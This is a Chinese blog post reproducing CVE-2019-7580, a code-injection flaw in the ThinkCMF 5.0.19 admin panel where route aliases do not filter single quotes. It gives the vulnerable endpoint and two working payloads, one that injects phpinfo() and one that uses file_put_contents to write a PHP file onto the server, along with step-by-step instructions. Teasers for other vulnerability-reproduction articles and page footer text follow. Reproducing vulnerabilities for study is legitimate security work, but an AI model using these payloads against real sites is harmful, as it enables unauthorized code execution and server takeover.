继续复现漏洞,持续关注thinkcmf。
thinkcmf5.0.19 这个版本后台提供路由自定义,其中路由的别名对单引号缺少过滤,导致引发漏洞。
下载地址
https://github.com/thinkcmf/thinkcmf/archive/5.0.190111.zip
http://thinkcmf5019.wwf/portal/admin_category/addpost.html
parent_id=0&name=111&alias=1'%3D%3Earray(%22%22)%2Cphpinfo()%2C'2
image.png
image.png
在美化url那里也可以实现同等写入操作
先登录后台->设置->URL美化->添加URL规则->选择规则(这个随便选一个,但必须要从这里面选)->在显示网址处填写我们的payload保存即可。
'.file_put_contents('1.php','<?php phpinfo();').'
image.png
前言 继续复现漏洞,持续关注thinkcmf。 描叙 thinkcmf5.0.19 这个版本后台提供路由自定义,其...
NetLogon 域内提权漏洞(CVE-2020-1472)复现 摘要 影响版本 复现环境 漏洞脚本 复现开始 首...
0x00目录 漏洞简介 影响版本 复现前提 复现环境 复现过程 总结 参考链接 0x01漏洞简介 ThinkPHP...
脏牛漏洞安卓复现 最近花了一些时间研究如何在Android系统上复现脏牛漏洞以及如何利用脏牛漏洞实现应用的静默安装...
SaltStack Shell 注入 (CVE-2020-16846)漏洞复现 一、漏洞简介 SaltStack是...
1、漏洞简介 该漏洞是由于 WinRAR 所使用的一个陈旧的动态链接库UNACEV2.dll所造成的,该动态链接库...
ThinkPHP Builder.php SQL注入漏洞(<= 3.2.3)的一次漏洞复现作业 漏洞环境:dock...
0x01 漏洞复现 本次复现的漏洞如题,是一个任意文件文件上传漏洞,但是此处的上传不需要页面有一个上传功能的界面,...
OpenSSH 命令注入漏洞(CVE-2020-15778)漏洞复现 详细描述 OpenSSH(OpenBSD S...
CVE-2015-1635-HTTP.SYS远程执行代码漏洞复现 一、漏洞描述 远程执行代码漏洞存在于 HTTP ...
本文标题:thinkcmf5.0.19漏洞CVE-2019-7580复现
本文链接:https://www.haomeiwen.com/subject/dzyglctx.html
网友评论